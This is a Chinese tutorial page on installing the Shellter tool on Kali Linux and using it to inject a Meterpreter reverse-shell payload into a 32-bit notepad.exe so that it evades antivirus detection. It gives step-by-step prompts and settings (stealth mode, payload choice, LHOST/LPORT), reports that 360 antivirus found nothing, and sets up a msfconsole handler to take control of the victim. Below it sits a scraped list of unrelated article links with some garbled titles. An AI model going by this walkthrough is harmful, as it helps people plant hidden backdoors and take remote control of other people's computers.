linux上apk免杀,kali 免杀工具shellter安装以及使用(示例代码)
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀
官网:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话
就需要安装wine环境来运行。我使用的Kali Linux 版本是kali-linux-2020.2目前最新版本 注意的是shellter目前只能注入32位的可执行文件
开始安装:
1. apt-get update //更新一下
2. apt-get install shellter //直接apt在线安装
安装完成后 ,终端直接输入shellter打开会报错,根据提示 我们直接执行命令dpkg --add-architecture i386 && apt-get update && apt-get install wine32
确认安装即可
现在我们打开shellter就可以打开运行了,工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹
shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。
免杀实验:
Choose Operation Mode - Auto/Manual (A/M/H):A //选择模式 A 自动模式自动注入后门,M高级模式,H帮助
PE Target:/home/notepad.exe // 注入的程序 这里已windows系统自带的32位记事本程序举例
Enable Stealth Mode? (Y/N/H): Y //是否启用隐身模式 输入Y启用
Use a listed payload or custom? (L/C/H): L //使用攻击模块列表或者自定义? 输入L 选择Payload
Select payload by index: 1 //选择第一个
SET LHOST: 192.168.37.137 //设置反弹回来的IP 本机
SET LPORT:4444 //设置接收反弹的端口
这样我们的木马后门shellcode就注入到这个文件里去了,
开启360全部查杀引擎,更新病毒库,查杀一下试试效果,没有任何提示。
打开msf,进行配置,
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost192.168.37.137set lport4444exploit //监听
这时运行带有后门的notepad.exe文件后,控制端成功连接上来,接下来就可以随意操作了。
linux上apk免杀,kali 免杀工具shellter安装以及使用(示例代码)相关推荐
- ANGRYsearch - Linux 上的超级快速文件搜索桌面工具
ANGRYsearch 是一个 linux 文件搜索实用程序,它试图模拟 Windows 中可用的"Everything".ANGRYsearch 在您键入文件名或目录时显示结果. ...
- linux上一款功能强大的取色工具
之前找了一款小巧的取色工具--gcolor2,如果只是简单的拾取颜色,这款工具足够了,但是想要其他更多的功能怎么办呢?比如:想要以不同的格式获取颜色;混色等等,gcolor2就无能为力了. 下面我们来 ...
- Linux 下的截屏并编辑的工具-flamshot安装及使用
方法1. linux 系统自带简单截图方式 支持功能:截取整个屏幕:屏幕中的某个区域:某个特定的窗口: 如果只需要获取一张屏幕截图,不对其进行编辑的话,那么键盘的默认快捷键就可以满足要求了.而且不仅仅 ...
- aix服务器查看文件编码格式,Linux stat命令和AIX istat命令 (查看文件修改时间)(示例代码)...
简介这篇文章主要介绍了Linux stat命令和AIX istat命令 (查看文件修改时间)(示例代码)以及相关的经验技巧,文章约919字,浏览量335,点赞数2,值得参考! 在工作中,经常会执行一些 ...
- linux 查杀php木马,linux上php木马、后门查杀总结
Web Server(Nginx为例) 1.为防止跨站感染,要做虚拟主机目录隔离(我是直接利用fpm建立多个程序池达到隔离效果) 2.上传目录.include类的库文件目录要禁止代码执行(Nginx正 ...
- linux上mysql卸数_Linux下MySQL卸载和安装图文教程
Linux下MySQL卸载和安装图文教程 发布时间:2020-09-02 08:43:17 来源:脚本之家 阅读:59 作者:伊宇紫 第一次写博客,做了两年的开发,工作之余给自己找点有意义的事做,分享 ...
- linux上C++开发——1. C++包管理工具
文章目录 1. 包管理器的作用 1.1 常见的包管理器 1.2 C++使用第三方库的方式 1.3 C++包管理器的诞生 1. 常见的C++包管理工具 1.1 Conan 1.2 vcpkg 1.3 其 ...
- linux上传文件操作,每天一个linux命令(文件上传下载文件操作):【转载】gzip命令(示例代码)...
减少文件大小有两个明显的好处,一是可以减少存储空间,二是通过网络传输文件时,可以减少传输的时间.gzip是在Linux系统中经常使用的一个对文件进行压缩和解压缩的命令,既方便又好用.gzip不仅可以用 ...
- kali linux 2.0 ssh,Kali 2.0使用SSH进行远程登录(示例代码)
一.配置SSH参数 修改sshd_config文件,命令为: vim /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉,并且将NO修改为YES ...
- linux上pyenv卸载,在Ubuntu 18.04系统下安装pyenv的方法
本文介绍在Ubuntu 18.04操作系统下安装pyenv的方法,使用它可以进行Python多版本管理,目的是防止不同的Python版本因为不兼容而出现错误.安装pyenv其实非常的简单,只需要在系统 ...
最新文章
- 【数据挖掘】决策树算法简介 ( 决策树模型 | 模型示例 | 决策树算法性能要求 | 递归创建决策树 | 树根属性选择 )
- MySQL-入门安装
- 数据科学竞赛-数据挖掘赛流程
- 流畅的Python之奇技淫巧(一)
- 苹果二型计算机语言,计算机语言排名排行榜! 苹果下滑严重!
- 矩阵A乘以B分数 15作者 陈越单位 浙江大学
- 无法找到元素 'aop:aspectj-autoproxy' 的声明
- android 传感器 频率,Android加速度传感器数值的过滤
- 【c++程序】求解一元二次方程
- 什么是淘宝私域流量?和公域流量流量有何区别?
- 树展示 移动端_一种手机端树形数据结构的展现方法与流程
- python应用——用python实现对excel的查找替换
- 网页中的png图片无法显示?
- 工具总结篇——vault
- BZOJ 1502 NOI2005 月下柠檬树 Simpson自适应公式
- LeetCode Weekly Contest 185
- 利用Fitbit,十秒入侵PC
- 使用宏批量插入图片到Word表格
- 【电气专业知识问答】问:什么叫变压器的接线组别?什么是变压器的接线组别的“时钟表示法“?
- 微信域名检测官方接口 微信域名实时检测系统